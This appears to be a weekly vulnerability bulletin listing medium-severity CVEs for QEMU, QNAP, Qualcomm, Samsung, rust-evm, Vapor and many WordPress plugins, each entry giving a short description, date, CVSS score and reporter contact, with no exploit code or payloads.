qemu — qemu A stack based buffer overflow was found in the virtio-net device of QEMU. This issue occurs when flushing TX in the virtio_net_flush_tx function if guest features VIRTIO_NET_F_HASH_REPORT, VIRTIO_F_VERSION_1 and VIRTIO_NET_F_MRG_RXBUF are enabled. This could allow a malicious user to overwrite local variables allocated on the stack. Specifically, the `out_sg` variable could be used to read a part of process memory and send it to the wire, causing an information leak. 2024-01-02 4.9 CVE-2023-6693
secalert@redhat.com
secalert@redhat.com
qnap_systems_inc. — qcalagent An OS command injection vulnerability has been reported to affect QcalAgent. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: QcalAgent 1.1.8 and later 2024-01-05 6.3 CVE-2023-41289
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QuTS hero h5.1.3.2578 build 20231110 and later 2024-01-05 6.6 CVE-2023-39294
security@qnapsecurity.com.tw
qnap_systems_inc. — qumagie A cross-site scripting (XSS) vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network. We have already fixed the vulnerability in the following version: QuMagie 2.2.1 and later 2024-01-05 5.5 CVE-2023-47559
security@qnapsecurity.com.tw
qnap_systems_inc. — video_station A SQL injection vulnerability has been reported to affect Video Station. If exploited, the vulnerability could allow users to inject malicious code via a network. We have already fixed the vulnerability in the following version: Video Station 5.7.2 ( 2023/11/23 ) and later 2024-01-05 4.3 CVE-2023-41287
security@qnapsecurity.com.tw
qualcomm,_inc. — snapdragon Memory corruption when IPv6 prefix timer object`s lifetime expires which are created while Netmgr daemon gets an IPv6 address. 2024-01-02 6.7 CVE-2023-28583
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while receiving a message in Bus Socket Transport Server. 2024-01-02 6.7 CVE-2023-33038
product-security@qualcomm.com
rust-ethereum — rust-ethereum Rust EVM is an Ethereum Virtual Machine interpreter. In `rust-evm`, a feature called `record_external_operation` was introduced, allowing library users to record custom gas changes. This feature can have some bogus interactions with the call stack. In particular, during finalization of a `CREATE` or `CREATE2`, in the case that the substack execution happens successfully, `rust-evm` will first commit the substate, and then call `record_external_operation(Write(out_code.len()))`. If `record_external_operation` later fails, this error is returned to the parent call stack, instead of `Succeeded`. Yet, the substate commitment already happened. This causes smart contracts able to commit state changes, when the parent caller contract receives zero address (which usually indicates that the execution has failed). This issue only impacts library users with custom `record_external_operation` that returns errors. The issue is patched in release 0.41.1. No known workarounds are available. 2024-01-02 5.9 CVE-2024-21629
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
rust-vmm — rust-vmm vmm-sys-util is a collection of modules that provides helpers and utilities used by multiple rust-vmm components. Starting in version 0.5.0 and prior to version 0.12.0, an issue in the `FamStructWrapper::deserialize` implementation provided by the crate for `vmm_sys_util::fam::FamStructWrapper` can lead to out of bounds memory accesses. The deserialization does not check that the length stored in the header matches the flexible array length. Mismatch in the lengths might allow out of bounds memory access through Rust-safe methods. The issue was corrected in version 0.12.0 by inserting a check that verifies the lengths of compared flexible arrays are equal for any deserialized header and aborting deserialization otherwise. Moreover, the API was changed so that header length can only be modified through Rust-unsafe code. This ensures that users cannot trigger out-of-bounds memory access from Rust-safe code. 2024-01-02 5.7 CVE-2023-50711
security-advisories@github.com
security-advisories@github.com
samsung_mobile — nearby_device_scanning Improper access control vulnerability in Nearby device scanning prior version 11.1.14.7 allows local attacker to access data. 2024-01-04 4 CVE-2024-20808
mobile.security@samsung.com
samsung_mobile — nearby_device_scanning Improper access control vulnerability in Nearby device scanning prior version 11.1.14.7 allows local attacker to access data. 2024-01-04 4 CVE-2024-20809
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Improper authentication vulnerability in Bluetooth pairing process prior to SMR Jan-2024 Release 1 allows remote attackers to establish pairing process without user interaction. 2024-01-04 6.8 CVE-2024-20803
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Improper access control in Notification service prior to SMR Jan-2024 Release 1 allows local attacker to access notification data. 2024-01-04 6.2 CVE-2024-20806
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Improper access control vulnerability in Samsung DeX prior to SMR Jan-2024 Release 1 allows owner to access other users’ notification in a multi-user environment. 2024-01-04 4.6 CVE-2024-20802
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Path traversal vulnerability in FileUriConverter of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file. 2024-01-04 4 CVE-2024-20804
mobile.security@samsung.com
sesami — cash_point_&_transport_optimizer An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows local attackers to obtain sensitive information and bypass authentication via “Back Button Refresh” attack. 2023-12-29 5.5 CVE-2023-31292
cve@mitre.org
sesami — cash_point_&_transport_optimizer CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows attackers to obtain sensitive information via the User Name field. 2023-12-29 5.3 CVE-2023-31296
cve@mitre.org
sesami — cash_point_&_transport_optimizer Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code and obtain sensitive information via the User ID field when creating a new system user. 2023-12-29 4.8 CVE-2023-31298
cve@mitre.org
sesami — cash_point_&_transport_optimizer Stored Cross Site Scripting (XSS) Vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code and obtain sensitive information via the Username field of the login form and application log. 2023-12-29 6.1 CVE-2023-31301
cve@mitre.org
silicon_labs — gecko_sdk Glitch detection is not enabled by default for the CortexM33 core in Silicon Labs secure vault high parts EFx32xG2xB, except EFR32xG21B. 2024-01-03 6.8 CVE-2023-5138
product-security@silabs.com
product-security@silabs.com
sourcecodester — engineers_online_portal A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Add Engineer Handler. The manipulation of the argument first name/last name with the input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249182 is the identifier assigned to this vulnerability. 2023-12-29 6.1 CVE-2023-7160
cna@vuldb.com
cna@vuldb.com
spider-flow — spider-flow A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. 2024-01-02 6.3 CVE-2024-0195
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
thirtybees — bees_blog The beesblog (aka Bees Blog) component before 1.6.2 for thirty bees allows Reflected XSS because controllers/front/post.php sharing_url is mishandled. 2023-12-30 6.1 CVE-2023-52264
cve@mitre.org
cve@mitre.org
cve@mitre.org
tongda — office_anywhere_2017 A vulnerability has been found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/project/proj/delete.php. The manipulation of the argument PROJ_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249367. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-30 4.3 CVE-2023-7180
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
vapor — vapor Vapor is an HTTP web framework for Swift. Prior to version 4.90.0, Vapor’s `vapor_urlparser_parse` function uses `uint16_t` indexes when parsing a URI’s components, which may cause integer overflows when parsing untrusted inputs. This vulnerability does not affect Vapor directly but could impact applications relying on the URI type for validating user input. The URI type is used in several places in Vapor. A developer may decide to use URI to represent a URL in their application (especially if that URL is then passed to the HTTP Client) and rely on its public properties and methods. However, URI may fail to properly parse a valid (albeit abnormally long) URL, due to string ranges being converted to 16-bit integers. An attacker may use this behavior to trick the application into accepting a URL to an untrusted destination. By padding the port number with zeros, an attacker can cause an integer overflow to occur when the URL authority is parsed and, as a result, spoof the host. Version 4.90.0 contains a patch for this issue. As a workaround, validate user input before parsing as a URI or, if possible, use Foundation’s `URL` and `URLComponents` utilities. 2024-01-03 6.5 CVE-2024-21631
security-advisories@github.com
security-advisories@github.com
view_component — view_component view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. Versions prior to 3.9.0 have a cross-site scripting vulnerability that has the potential to impact anyone rendering a component directly from a controller with the view_component gem. Note that only components that define a `#call` method (i.e. instead of using a sidecar template) are affected. The return value of the `#call` method is not sanitized and can include user-defined content. In addition, the return value of the `#output_postamble` methodis not sanitized, which can also lead to cross-site scripting issues. Versions 3.9.0 has been released and fully mitigates both the `#call` and the `#output_postamble` vulnerabilities. As a workaround, sanitize the return value of `#call`. 2024-01-04 6.1 CVE-2024-21636
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
winter_cms — winter_cms Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4. 2023-12-29 5.4 CVE-2023-52085
security-advisories@github.com
security-advisories@github.com
wiremock — wiremock WireMock with GUI versions 3.2.0.0 through 3.0.4.0 are vulnerable to stored cross-site scripting (SXSS) through the recording feature. An attacker can host a malicious payload and perform a test mapping pointing to the attacker’s file, and the result will render on the Matched page in the Body area, resulting in the execution of the payload. This occurs because the response body is not validated or sanitized. 2023-12-29 6.1 CVE-2023-50069
cve@mitre.org
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms. Thís issue affects Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms through 1.2.8. 2023-12-29 6.1 CVE-2023-31095
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in WP Directory Kit. This issue affects WP Directory Kit through 1.1.9. 2023-12-29 6.1 CVE-2023-31229
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Dylan James Zephyr Project Manager. This issue affects Zephyr Project Manager through 3.3.9. 2023-12-29 6.1 CVE-2023-31237
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Pexle Chris Library Viewer. This issue affects Library Viewer through 2.0.6. 2023-12-29 6.1 CVE-2023-32101
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in PluginOps MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder. This issue affects MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder through 4.0.9.3. 2023-12-29 6.1 CVE-2023-32517
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodexThemes TheGem – Creative Multi-Purpose & WooCommerce WordPress Theme allows Reflected XSS. This issue affects TheGem – Creative Multi-Purpose & WooCommerce WordPress Theme through 5.9.1. 2023-12-29 6.1 CVE-2023-50892
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in UpSolution Impreza – WordPress Website and WooCommerce Builder allows Reflected XSS. This issue affects Impreza – WordPress Website and WooCommerce Builder through 8.17.4. 2023-12-29 6.1 CVE-2023-50893
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HasThemes HT Mega – Absolute Addons For Elementor allows Reflected XSS. This issue affects HT Mega – Absolute Addons For Elementor through 2.3.8. 2023-12-29 6.1 CVE-2023-50901
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ian Kennerley Google Photos Gallery with Shortcodes allows Reflected XSS. This issue affects Google Photos Gallery with Shortcodes through 4.0.2. 2023-12-29 6.1 CVE-2023-51373
audit@patchstack.com
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Leevio Happy Addons for Elementor. This issue affects Happy Addons for Elementor through 3.9.1.1. 2023-12-29 6.5 CVE-2023-51676
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ShapedPlugin LLC WP Tabs – Responsive Tabs Plugin for WordPress allows Stored XSS. This issue affects WP Tabs – Responsive Tabs Plugin for WordPressthrough 2.2.0. 2024-01-05 6.5 CVE-2023-52124
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in webvitaly iframe allows Stored XSS. This issue affects iframe through 4.8. 2024-01-05 6.5 CVE-2023-52125
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress through 9.0.4. 2024-01-05 6.3 CVE-2023-52129
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in MojofyWP WP Affiliate Disclosure allows Stored XSS. This issue affects WP Affiliate Disclosure through 1.2.7. 2024-01-05 6.5 CVE-2023-52178
audit@patchstack.com
wordpress — wordpress The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the map title parameter in all versions up to and including 2.88.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-03 6.4 CVE-2023-6524
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘msg’ parameter in all versions up to, and including, 2.8.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2024-01-03 6.1 CVE-2023-6629
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The WP-Members Membership Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.8 via the wpmem_field shortcode. This makes it possible for authenticated attackers, with contributor access and above, to extract sensitive data including user emails, password hashes, usernames, and more. 2024-01-04 6.5 CVE-2023-6733
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Best WordPress Gallery Plugin – FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom attributes in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping. This makes it possible for contributors and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-03 6.4 CVE-2023-6747
security@wordfence.com
security@wordfence.com
wordpress — wordpress The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-06 6.4 CVE-2023-6801
security@wordfence.com
security@wordfence.com
wordpress — wordpress The WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to SQL Injection via the ‘group_id’ parameter in all versions up to, and including, 6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can be leveraged to achieve Reflected Cross-site Scripting. 2024-01-03 6.1 CVE-2023-6981
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s embed_oembed_html shortcode in all versions up to 3.9.5 (exclusive) due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-03 6.4 CVE-2023-6986
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom ID in all versions up to, and including, 5.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access and higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-04 6.4 CVE-2023-7044
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Automattic WordPress.Com Editing Toolkit allows Stored XSS. This issue affects WordPress.Com Editing Toolkit through 3.78784. 2023-12-29 5.4 CVE-2023-50879
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in The BuddyPress Community BuddyPress allows Stored XSS. This issue affects BuddyPress through 11.3.1. 2023-12-29 5.4 CVE-2023-50880
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More allows Stored XSS. This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More through 6.9.15. 2023-12-29 5.4 CVE-2023-50881
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in The Beaver Builder Team Beaver Builder – WordPress Page Builder allows Stored XSS. This issue affects Beaver Builder – WordPress Page Builder through 2.7.2. 2023-12-29 5.4 CVE-2023-50889
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Zoho Forms Form plugin for WordPress – Zoho Forms allows Stored XSS. This issue affects Form plugin for WordPress – Zoho Forms through 3.0.1. 2023-12-29 5.4 CVE-2023-50891
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brizy.Io Brizy – Page Builder allows Stored XSS. This issue affects Brizy – Page Builder through 2.4.29. 2023-12-29 5.4 CVE-2023-51396
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brainstorm Force WP Remote Site Search allows Stored XSS. This issue affects WP Remote Site Search through 1.0.4. 2023-12-29 5.4 CVE-2023-51397
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPFactory Back Button Widget allows Stored XSS. This issue affects Back Button Widget through 1.6.3. 2023-12-29 5.4 CVE-2023-51399
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CodePeople Calculated Fields Form. This issue affects Calculated Fields Form through 1.2.28. 2023-12-29 5.4 CVE-2023-51517
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aleksandar Uroševi? Stock Ticker allows Stored XSS. This issue affects Stock Ticker through 3.23.4. 2023-12-29 5.4 CVE-2023-51541
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Designful Stylish Price List – Price Table Builder & QR Code Restaurant Menu. This issue affects Stylish Price List – Price Table Builder & QR Code Restaurant Menu through 7.0.17. 2024-01-05 5.4 CVE-2023-51673
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Basix NEX-Forms – Ultimate Form Builder – Contact forms and much more. This issue affects NEX-Forms – Ultimate Form Builder – Contact forms and much more through 8.5.2. 2024-01-05 5.4 CVE-2023-52120
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in NitroPack Inc. NitroPack – Cache & Speed Optimization for Core Web Vitals, Defer CSS & JavaScript, Lazy load Images. This issue affects NitroPack – Cache & Speed Optimization for Core Web Vitals, Defer CSS & JavaScript, Lazy load Images through 1.10.2. 2024-01-05 5.4 CVE-2023-52121
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Suman Bhattarai Send Users Email. This issue affects Send Users Email through 1.4.3. 2024-01-05 5.3 CVE-2023-52126
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Aaron J 404 Solution. This issue affects 404 Solution through 2.33.0. 2024-01-05 5.3 CVE-2023-52146
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in wp.Insider, wpaffiliatemgr Affiliates Manager. This issue affects Affiliates Manager through 2.9.30. 2024-01-05 5.3 CVE-2023-52148
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Floating Button. This issue affects Floating Button through 6.0. 2024-01-05 5.4 CVE-2023-52149
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Uncanny Automator, Uncanny Owl Uncanny Automator – Automate everything with the #1 no-code automation and integration plugin. This issue affects Uncanny Automator – Automate everything with the #1 no-code automation and integration plugin through 5.1.0.2. 2024-01-05 5.3 CVE-2023-52151
audit@patchstack.com
wordpress — wordpress The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘pagelayer_header_code’, ‘pagelayer_body_open_code’, and ‘pagelayer_footer_code’ meta fields in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This appears to be a reintroduction of a vulnerability patched in version 1.7.7. 2024-01-04 5.4 CVE-2023-6738
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check when updating settings in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with author-level access or above to change the plugin’s settings including proxy settings, which are also exposed to authors. 2024-01-06 5.4 CVE-2023-6798
security@wordfence.com
security@wordfence.com
wordpress — wordpress The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.13. This is due to missing or incorrect nonce validation in the powerpack-lite-for-elementor/classes/class-pp-admin-settings.php file. This makes it possible for unauthenticated attackers to modify and reset plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2024-01-03 5.3 CVE-2023-6984
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Product Expiry for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘save_settings’ function in versions up to, and including, 2.5. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings. 2024-01-03 5.4 CVE-2024-0201
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in weForms weForms – Easy Drag & Drop Contact Form Builder For WordPress allows Stored XSS. This issue affects weForms – Easy Drag & Drop Contact Form Builder For WordPress through 1.6.17. 2023-12-29 4.8 CVE-2023-50896
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ginger Plugins Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button allows Stored XSS. This issue affects Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button through 1.1.8. 2023-12-29 4.8 CVE-2023-51361
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Bit Assist Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget allows Stored XSS. This issue affects Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget through 1.1.9. 2023-12-29 4.8 CVE-2023-51371
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HasThemes HashBar – WordPress Notification Bar allows Stored XSS. This issue affects HashBar – WordPress Notification Bar through 1.4.1. 2023-12-29 4.8 CVE-2023-51372
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZeroBounce ZeroBounce Email Verification & Validation allows Stored XSS. This issue affects ZeroBounce Email Verification & Validation through 1.0.11. 2023-12-29 4.8 CVE-2023-51374
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in CleanTalk – Anti-Spam Protection Spam protection, Anti-Spam, FireWall by CleanTalk. This issue affects Spam protection, Anti-Spam, FireWall by CleanTalk through 6.20. 2024-01-05 4.3 CVE-2023-51535
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Awesome Support Team Awesome Support – WordPress HelpDesk & Support Plugin. This issue affects Awesome Support – WordPress HelpDesk & Support Plugin through 6.1.5. 2024-01-05 4.3 CVE-2023-51538
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Apollo13Themes Apollo13 Framework Extensions. This issue affects Apollo13 Framework Extensions through 1.9.1. 2024-01-05 4.3 CVE-2023-51539
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP Zone Inline Image Upload for BBPress. This issue affects Inline Image Upload for BBPress through 1.1.18. 2024-01-05 4.3 CVE-2023-51668
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More. This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More through 6.9.18. 2023-12-29 4.7 CVE-2023-51675
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search through 2.0.33. 2024-01-05 4.3 CVE-2023-51678
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Icegram Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building. This issue affects Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building through 3.1.18. 2024-01-05 4.3 CVE-2023-52119
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Job Board. This issue affects Simple Job Board through 2.10.6. 2024-01-05 4.3 CVE-2023-52122
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPChill Strong Testimonials. This issue affects Strong Testimonials through 3.1.10. 2024-01-05 4.3 CVE-2023-52123
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPClever WPC Product Bundles for WooCommerce. This issue affects WPC Product Bundles for WooCommerce through 7.3.1. 2024-01-05 4.3 CVE-2023-52127
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WhiteWP White Label – WordPress Custom Admin, Custom Login Page, and Custom Dashboard. This issue affects White Label – WordPress Custom Admin, Custom Login Page, and Custom Dashboard through 2.9.0. 2024-01-05 4.3 CVE-2023-52128
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in wp.Insider, wpaffiliatemgr Affiliates Manager. This issue affects Affiliates Manager through 2.9.31. 2024-01-05 4.3 CVE-2023-52130
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Smash Balloon Custom Twitter Feeds – A Tweets Widget or X Feed Widget. This issue affects Custom Twitter Feeds – A Tweets Widget or X Feed Widget through 2.1.2. 2024-01-05 4.3 CVE-2023-52136
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Republish Old Posts. This issue affects Republish Old Posts through 1.21. 2024-01-05 4.3 CVE-2023-52145
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP Job Portal WP Job Portal – A Complete Job Board. This issue affects WP Job Portal – A Complete Job Board through 2.0.6. 2024-01-05 4.3 CVE-2023-52184
audit@patchstack.com
wordpress — wordpress The Depicter Slider – Responsive Image Slider, Video Slider & Post Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the ‘save’ function. This makes it possible for unauthenticated attackers to modify the plugin’s settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. CVE-2023-51491 appears to be a duplicate of this issue. 2024-01-05 4.3 CVE-2023-6493
security@wordfence.com
security@wordfence.com
